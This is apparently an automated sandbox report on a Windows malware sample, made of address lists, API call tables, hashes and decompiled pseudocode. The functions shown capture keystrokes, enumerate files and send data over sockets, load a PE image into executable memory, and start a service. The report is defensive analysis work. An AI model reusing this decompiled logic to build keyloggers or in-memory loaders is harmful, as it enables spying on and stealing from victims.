                    0x00408991
                    0x00408995
                    0x0040899a
                    0x004089a1
                    0x004089a6
                    0x004089a9
                    0x004089a9
                    0x004089aa
                    0x004089aa
                    0x004089aa
                    0x00408991
                    0x004089bb
                    0x004089c4
                    0x004089e0
                    0x004089e5
                    0x004089f4
                    0x00408a0e
                    0x00408a10
                    0x00408a16
                    0x00408a1b
                    0x00408a1e
                    0x00000000
                    0x00408a20
                    0x00408a20
                    0x00408a2a
                    0x00408a2f
                    0x00408a37
                    0x00408a3f
                    0x00408a44
                    0x00408a4b
                    0x00408a50
                    0x00000000
                    0x00408a50
                    0x00408a58
                    0x00408a58
                    0x00408a60
                    0x00408a66
                    0x00408a68
                    0x00000000
                    0x00000000
                    0x00408a6e
                    0x00408a71
                    0x00408a74
                    0x00408a8a
                    0x00408a91
                    0x00408b52
                    0x00408b5f
                    0x00408b73
                    0x00408b84
                    0x00408b9e
                    0x00408ba3
                    0x00408bb7
                    0x00408bba
                    0x00408c57
                    0x00408c5d
                    0x00408c62
                    0x00000000
                    0x00408bc0
                    0x00408bdb
                    0x00408be3
                    0x00408be8
                    0x00408c12
                    0x00408c16
                    0x00408c1c
                    0x00408c21
                    0x00408c26
                    0x00408c29
                    0x00408c2f
                    0x00408c3a
                    0x00408c3f
                    0x00408c41
                    0x00000000
                    0x00408c43
                    0x00408c43
                    0x00408c4a
                    0x00408c4f
                    0x00000000
                    0x00408c4f
                    0x00408c41
                    0x00408a97
                    0x00408aa3
                    0x00408aaa
                    0x00408aac
                    0x00000000
                    0x00408ab2
                    0x00408ac5
                    0x00408ac7
                    0x00000000
                    0x00408acd
                    0x00408af1
                    0x00408af6
                    0x00408b02
                    0x00408b0a
                    0x00408b0f
                    0x00408b18
                    0x00408b1d
                    0x00408b26
                    0x00408b2d
                    0x00408b32
                    0x00408b34
                    0x00408b4d
                    0x00000000
                    0x00408b36
                    0x00408b36
                    0x00408b3d
                    0x00408b42
                    0x00000000
                    0x00408b42
                    0x00408b34
                    0x00408ac7
                    0x00408aac
                    0x00408cdd
                    0x00408ce3
                    0x00408ceb
                    0x00408cf3
                    0x00408cfb
                    0x00408d03
                    0x00408d0b
                    0x00408d18
                    0x00408a76
                    0x00408a77
                    0x00408a7d
                    0x00408a80
                    0x00408a80
                    0x00000000
                    0x00408a80
                    0x00408c6a
                    0x00408c6f
                    0x00408c92
                    0x00408c96
                    0x00408c9c
                    0x00408ca1
                    0x00408ca9
                    0x00000000

                    APIs
                    • __EH_prolog.LIBCMT ref: 0040890E
                      • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004089AA
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A08
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00408A60
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408A77
                      • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E18
                      • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E23
                      • Part of subcall function 00404E06: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051A0,?,?,?,00405139), ref: 00404E2C
                    • FindClose.KERNEL32(00000000), ref: 00408C6F
                      • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00472EE0,?), ref: 00404B27
                      • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00472EE0,?,?,?,?,?,?,0040545D), ref: 00404B55
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                    • String ID:
                    • API String ID: 1824512719-0
                    • Opcode ID: 37be2e0fa6e91f9a51b205309b85f8c57a9833f0dd293f7601e131ad217d934b
                    • Instruction ID: d8a72a11d5b22176fcc9823f728123f790ce651a5e6d51f59b88b1622e7f2630
                    • Opcode Fuzzy Hash: 37be2e0fa6e91f9a51b205309b85f8c57a9833f0dd293f7601e131ad217d934b
                    • Instruction Fuzzy Hash: F1B17D729001099BCB14FBA1DD96AEDB378AF40318F50417FF506B61D2EF386A49CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00411241 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E00411241(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t52;
				signed int _t55;
				void* _t58;
				signed int _t66;
				signed int _t68;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t77;
				signed int _t78;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				void* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t104;
				void* _t106;
				signed int _t109;
				void* _t115;
				void* _t116;
				signed int _t117;
				signed int _t119;
				void* _t121;
				signed int _t123;
				signed int _t126;
				void* _t127;
				void* _t128;

				_t106 = 0x40;
				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
				_t119 = 0;
				if(E00410CDF(__edx, _t106) != 0) {
					__eflags =  *__ecx - 0x5a4d;
					if( *__ecx == 0x5a4d) {
						_t52 = E00410CDF(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
						__eflags = _t52;
						if(_t52 == 0) {
							goto L1;
						}
						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
						__eflags =  *_t90 - 0x4550;
						if( *_t90 != 0x4550) {
							goto L3;
						}
						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
							goto L3;
						}
						__eflags =  *(_t90 + 0x38) & 0x00000001;
						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
							goto L3;
						}
						_t109 =  *(_t90 + 6) & 0x0000ffff;
						_t55 =  *(_t90 + 0x14) & 0x0000ffff;
						__eflags = _t109;
						if(_t109 == 0) {
							L14:
							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
							_t116 = E00410CCE( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
							_t58 = E00410CCE(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
							__eflags = _t116 - _t58;
							if(_t116 == _t58) {
								_push(0);
								_t126 = E004111E6( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 0x40);
								_t128 = _t127 + 0x14;
								__eflags = _t126;
								if(_t126 != 0) {
									L20:
									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
									__eflags = _t117;
									if(_t117 != 0) {
										 *(_t117 + 4) = _t126;
										 *((intOrPtr*)(_t117 + 0x1c)) = E004111E6;
										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
										 *((intOrPtr*)(_t117 + 0x20)) = E004111FD;
										 *((intOrPtr*)(_t117 + 0x24)) = E00411210;
										 *((intOrPtr*)(_t117 + 0x28)) = E0041121B;
										 *((intOrPtr*)(_t117 + 0x2c)) = E0041122A;
										 *((intOrPtr*)(_t117 + 0x34)) = 0;
										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
										_t66 = E00410CDF( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
										__eflags = _t66;
										if(_t66 == 0) {
											L34:
											E004115BA(_t117);
											L35:
											_t68 = 0;
											__eflags = 0;
											L36:
											return _t68;
										}
										_push(0);
										_t121 = E004111E6(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
										E004351E0(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;
										 *_t117 = _t73;
										 *(_t73 + 0x34) = _t126;
										_t74 = E00410CF2( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);
										__eflags = _t74;
										if(_t74 == 0) {
											goto L34;
										}
										_t75 =  *_t117;
										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
											_t123 = 1;
											__eflags = 1;
											 *((intOrPtr*)(_t117 + 0x18)) = 1;
										} else {
											 *((intOrPtr*)(_t117 + 0x18)) = E00410FF6(_t114);
											_t123 = 1;
										}
										__eflags = E004110A2(_t117);
										if(__eflags != 0) {
											_t77 = E00410E92(_t117, __eflags);
											__eflags = _t77;
											if(_t77 == 0) {
												goto L34;
											}
											_t78 = E00410FC5(_t117);
											__eflags = _t78;
											if(_t78 == 0) {
												goto L34;
											}
											_t80 =  *( *_t117 + 0x28);
											__eflags = _t80;
											if(_t80 == 0) {
												_t48 = _t117 + 0x38;
												 *_t48 =  *(_t117 + 0x38) & 0x00000000;
												__eflags =  *_t48;
												L41:
												_t68 = _t117;
												goto L36;
											}
											_t81 = _t80 + _t126;
											__eflags =  *(_t117 + 0x14);
											if( *(_t117 + 0x14) == 0) {
												 *(_t117 + 0x38) = _t81;
												goto L41;
											}
											_t82 =  *_t81(_t126, _t123, 0);
											__eflags = _t82;
											if(_t82 != 0) {
												 *((intOrPtr*)(_t117 + 0x10)) = _t123;
												goto L41;
											}
											SetLastError(0x45a);
										}
										goto L34;
									}
									_push(0);
									E004111FD(_t126, 0, 0x8000);
									L19:
									SetLastError(0xe);
									L16:
									goto L35;
								}
								_push(0);
								_t126 = E004111E6(0, _t116, 0x3000, 0x40);
								_t128 = _t128 + 0x14;
								__eflags = _t126;
								if(_t126 != 0) {
									goto L20;
								}
								goto L19;
							}
							SetLastError(0xc1);
							goto L16;
						}
						_t104 = _t90 + 0x24 + _t55;
						__eflags = _t104;
						do {
							__eflags =  *(_t104 + 4);
							_t86 =  *_t104;
							if( *(_t104 + 4) != 0) {
								_t87 = _t86 +  *(_t104 + 4);
								__eflags = _t87;
							} else {
								_t87 = _t86 +  *(_t90 + 0x38);
							}
							__eflags = _t87 - _t119;
							_t119 =  >  ? _t87 : _t119;
							_t104 = _t104 + 0x28;
							_t109 = _t109 - 1;
							__eflags = _t109;
						} while (_t109 != 0);
						goto L14;
					}
					L3:
					SetLastError(0xc1);
				}
				L1:
				return 0;
			}































                    0x0041124d
                    0x00411250
                    0x00411254
                    0x00411258
                    0x00411261
                    0x0041126f
                    0x00411273
                    0x0041128d
                    0x00411292
                    0x00411294
                    0x00000000
                    0x00000000
                    0x00411299
                    0x0041129b
                    0x004112a1
                    0x00000000
                    0x00000000
                    0x004112a8
                    0x004112ac
                    0x00000000
                    0x00000000
                    0x004112ae
                    0x004112b2
                    0x00000000
                    0x00000000
                    0x004112b4
                    0x004112b8
                    0x004112bc
                    0x004112be
                    0x004112e2
                    0x004112e8
                    0x004112fc
                    0x004112fe
                    0x00411303
                    0x00411305
                    0x00411319
                    0x0041132a
                    0x0041132c
                    0x0041132f
                    0x00411331
                    0x0041134f
                    0x00411360
                    0x00411362
                    0x00411364
                    0x0041137c
                    0x00411389
                    0x00411390
                    0x00411393
                    0x0041139a
                    0x004113a1
                    0x004113a8
                    0x004113af
                    0x004113b6
                    0x004113bc
                    0x004113c1
                    0x004113c3
                    0x00411473
                    0x00411475
                    0x0041147a
                    0x0041147a
                    0x0041147a
                    0x0041147c
                    0x00000000
                    0x0041147c
                    0x004113c9
                    0x004113dd
                    0x004113e4
                    0x004113f9
                    0x004113fb
                    0x004113fe
                    0x00411401
                    0x00411409
                    0x0041140b
                    0x00000000
                    0x00000000
                    0x0041140d
                    0x00411412
                    0x00411412
                    0x00411415
                    0x00411428
                    0x00411428
                    0x00411429
                    0x00411417
                    0x00411420
                    0x00411423
                    0x00411423
                    0x00411433
                    0x00411435
                    0x00411439
                    0x0041143e
                    0x00411440
                    0x00000000
                    0x00000000
                    0x00411444
                    0x00411449
                    0x0041144b
                    0x00000000
                    0x00000000
                    0x0041144f
                    0x00411452
                    0x00411454
                    0x0041148e
                    0x0041148e
                    0x0041148e
                    0x00411492
                    0x00411492
                    0x00000000
                    0x00411492
                    0x00411456
                    0x00411458
                    0x0041145c
                    0x00411489
                    0x00000000
                    0x00411489
                    0x00411462
                    0x00411464
                    0x00411466
                    0x00411484
                    0x00000000
                    0x00411484
                    0x0041146d
                    0x0041146d
                    0x00000000
                    0x00411435
                    0x00411366
                    0x0041136e
                    0x0041134b
                    0x0041130c
                    0x0041130c
                    0x00000000
                    0x0041130c
                    0x00411333
                    0x00411342
                    0x00411344
                    0x00411347
                    0x00411349
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00411349
                    0x0041130c
                    0x00000000
                    0x0041130c
                    0x004112c3
                    0x004112c3
                    0x004112c5
                    0x004112c5
                    0x004112c9
                    0x004112cb
                    0x004112d2
                    0x004112d2
                    0x004112cd
                    0x004112cd
                    0x004112cd
                    0x004112d5
                    0x004112d7
                    0x004112da
                    0x004112dd
                    0x004112dd
                    0x004112dd
                    0x00000000
                    0x004112c5
                    0x00411275
                    0x0041127a
                    0x0041127a
                    0x00411263
                    0x00000000

                    APIs
                      • Part of subcall function 00410CDF: SetLastError.KERNEL32(0000000D,0041125F,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 00410CE5
                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 0041127A
                    • GetNativeSystemInfo.KERNEL32(?,00409AFF,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041123D), ref: 004112E8
                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041130C
                      • Part of subcall function 004111E6: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,0041132A,?,00000000,00003000,00000040,00000000,?,?), ref: 004111F6
                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411353
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041135A
                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041146D
                      • Part of subcall function 004115BA: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041147A,?,?,?,?,?), ref: 0041162A
                      • Part of subcall function 004115BA: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00411631
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                    • String ID:
                    • API String ID: 3950776272-0
                    • Opcode ID: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                    • Instruction ID: 0cb4cb50e04e4c00dda63c2048a6518c68fbc69f33767e983cf50f1e9feca01c
                    • Opcode Fuzzy Hash: bd525cc1913b0ea8265babaacec09d0fcbdf2b7538008eea0c1f98325fc720c9
                    • Instruction Fuzzy Hash: 7F61D470605201ABD7109F66CD81BAB7BA5BF44740F04416AFE05977A2EBBCD8C1CBD9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004099E3 Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E004099E3(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				void* __ebp;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;
				void* _t37;
				void* _t41;

				_t30 = __ecx;
				E00435760(_t37,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0040415E(_t30, _a4, _t36, _t41,  &_v40);
				return _a4;
			}
















                    0x004099fa
                    0x004099ff
                    0x00409a0c
                    0x00409a12
                    0x00409a13
                    0x00409a15
                    0x00409a29
                    0x00409a33
                    0x00409a40
                    0x00409a5c
                    0x00409a69
                    0x00409a77

                    APIs
                    • GetForegroundWindow.USER32(00000000,?,00000000), ref: 00409A17
                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409A22
                    • GetKeyboardLayout.USER32 ref: 00409A29
                    • GetKeyState.USER32(00000010), ref: 00409A33
                    • GetKeyboardState.USER32(?), ref: 00409A40
                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409A5C
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                    • String ID:
                    • API String ID: 3566172867-0
                    • Opcode ID: 335d353787f1a1441ab9bf81f1485f4031705ba2e58d60c419ec6f48bb68709f
                    • Instruction ID: aeedf37edc6dd1a703413de17d62dd48ee8b6b0f748b25ac56bea9041ac92ee6
                    • Opcode Fuzzy Hash: 335d353787f1a1441ab9bf81f1485f4031705ba2e58d60c419ec6f48bb68709f
                    • Instruction Fuzzy Hash: 35110C7290020CABDB109BA4ED49FDA77ACEB0C316F1004B5FE05E6191E675AA54DBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004195A5 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004195A5(char _a4) {
				signed int _t14;
				void* _t17;
				void* _t18;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18, E00401EE4( &_a4), 0x10);
				if(_t17 != 0) {
					_t14 = 0 | StartServiceW(_t17, 0, 0) != 0x00000000;
					CloseServiceHandle(_t18);
					CloseServiceHandle(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				E00401EE9();
				return _t14;
			}






                    0x004195aa
                    0x004195ba
                    0x004195c9
                    0x004195cd
                    0x004195ea
                    0x004195ed
                    0x004195f0
                    0x004195cf
                    0x004195d0
                    0x004195d0
                    0x004195f6
                    0x00419600

                    APIs
                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,004191FB,00000000), ref: 004195AE
                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,004191FB,00000000), ref: 004195C3
                    • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195D0
                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,004191FB,00000000), ref: 004195DB
                    • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195ED
                    • CloseServiceHandle.ADVAPI32(00000000,?,004191FB,00000000), ref: 004195F0
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$Open$ManagerStart
                    • String ID:
                    • API String ID: 276877138-0
                    • Opcode ID: a350a4912117bdb20476acd08089d57fbfd71a973df2ad4d6386a0f0e30e5d6f
                    • Instruction ID: 9846d5d3bfd465166b522490e3d014472adb2eb81bdb42509a6f537d7eac31bb
                    • Opcode Fuzzy Hash: a350a4912117bdb20476acd08089d57fbfd71a973df2ad4d6386a0f0e30e5d6f
                    • Instruction Fuzzy Hash: 43F0E9721052247FD2119F20BCC8DFF27ECDF81BA6B00043AF501921D18F68CD45A5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00450558 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 68%
                    			E00450558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				signed int _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				short _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t34 = E00446A95(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E004504E9(0x45e200, 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E0044FE5A(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E0044FF7D();
					} else {
						E0044FEE3(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E004504E9(0x45def0, 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E0044FF7D();
							} else {
								E0044FEE3(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E004503B7(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x443374
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E0044E949(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E0043A5E8();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x46f00c; // 0x54ba778e
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E00446A95(_t89, _t100, _t116);
								_t122 =  *(E00446A95(_t90, _t100, _t116) + 0x34c);
								_t129 = E00450C6B(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E00452294(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v272);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E00450D9F(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								__eflags = _v32 ^ _t132;
								return E004338BB(_v32 ^ _t132);
							} else {
								_t68 = E0044716D(_t100, _t127, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E0044716D(_t100, _t127, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E00456277(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E0044716D(_t112, _t127, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E00456277(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E004407BF(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}












































                    0x00450558
                    0x0045055d
                    0x0045055e
                    0x0045055f
                    0x00450560
                    0x00450561
                    0x00450562
                    0x00450567
                    0x0045056a
                    0x0045056c
                    0x0045056f
                    0x0045056f
                    0x00450572
                    0x00450572
                    0x00450578
                    0x0045057b
                    0x0045057e
                    0x0045057e
                    0x00450581
                    0x00450584
                    0x0045058a
                    0x0045058c
                    0x00450591
                    0x0045059b
                    0x004505a0
                    0x004505a3
                    0x004505a3
                    0x004505a7
                    0x004505ab
                    0x004505f4
                    0x00000000
                    0x004505ad
                    0x004505b2
                    0x004505bb
                    0x004505b4
                    0x004505b4
                    0x004505b4
                    0x004505c2
                    0x004505c6
                    0x004505d0
                    0x004505d5
                    0x004505da
                    0x004505e0
                    0x004505e4
                    0x004505ed
                    0x004505e6
                    0x004505e6
                    0x004505e6
                    0x004505f9
                    0x004505f9
                    0x004505f9
                    0x004505da
                    0x004505c6
                    0x004505ff
                    0x00450711
                    0x00450711
                    0x00450711
                    0x00000000
                    0x00450605
                    0x00450612
                    0x00450618
                    0x00000000
                    0x00450648
                    0x00450648
                    0x0045064d
                    0x0045064f
                    0x0045064f
                    0x00450651
                    0x00450651
                    0x00450656
                    0x0045070c
                    0x0045070e
                    0x00000000
                    0x0045065c
                    0x0045065c
                    0x0045065f
                    0x00450667
                    0x0045066a
                    0x0045066d
                    0x0045066d
                    0x00450670
                    0x00450673
                    0x0045067b
                    0x00450680
                    0x00450687
                    0x0045068c
                    0x0045068f
                    0x00450691
                    0x0045071c
                    0x0045071d
                    0x0045071e
                    0x0045071f
                    0x00450720
                    0x00450721
                    0x00450726
                    0x0045072a
                    0x00450732
                    0x00450739
                    0x0045073c
                    0x0045073d
                    0x00450741
                    0x00450747
                    0x0045074f
                    0x0045075e
                    0x0045076a
                    0x0045077b
                    0x00450781
                    0x00450783
                    0x00450794
                    0x0045079b
                    0x0045079d
                    0x004507a0
                    0x004507a6
                    0x004507a8
                    0x004507aa
                    0x004507aa
                    0x004507ad
                    0x004507b0
                    0x004507b0
                    0x004507a8
                    0x004507ba
                    0x00450785
                    0x00450785
                    0x00450787
                    0x004507c2
                    0x004507cd
                    0x00450697
                    0x004506a0
                    0x004506a5
                    0x004506a7
                    0x00000000
                    0x004506a9
                    0x004506ab
                    0x004506c5
                    0x00000000
                    0x004506c7
                    0x004506c7
                    0x004506ca
                    0x004506d0
                    0x004506d3
                    0x004506e3
                    0x004506f6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004506d5
                    0x004506d5
                    0x004506d8
                    0x004506de
                    0x004506df
                    0x004506e1
                    0x004506f8
                    0x00450704
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004506e1
                    0x004506d3
                    0x004506c5
                    0x00450713
                    0x00450719
                    0x00450719
                    0x00450691
                    0x00450656
                    0x00450618

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
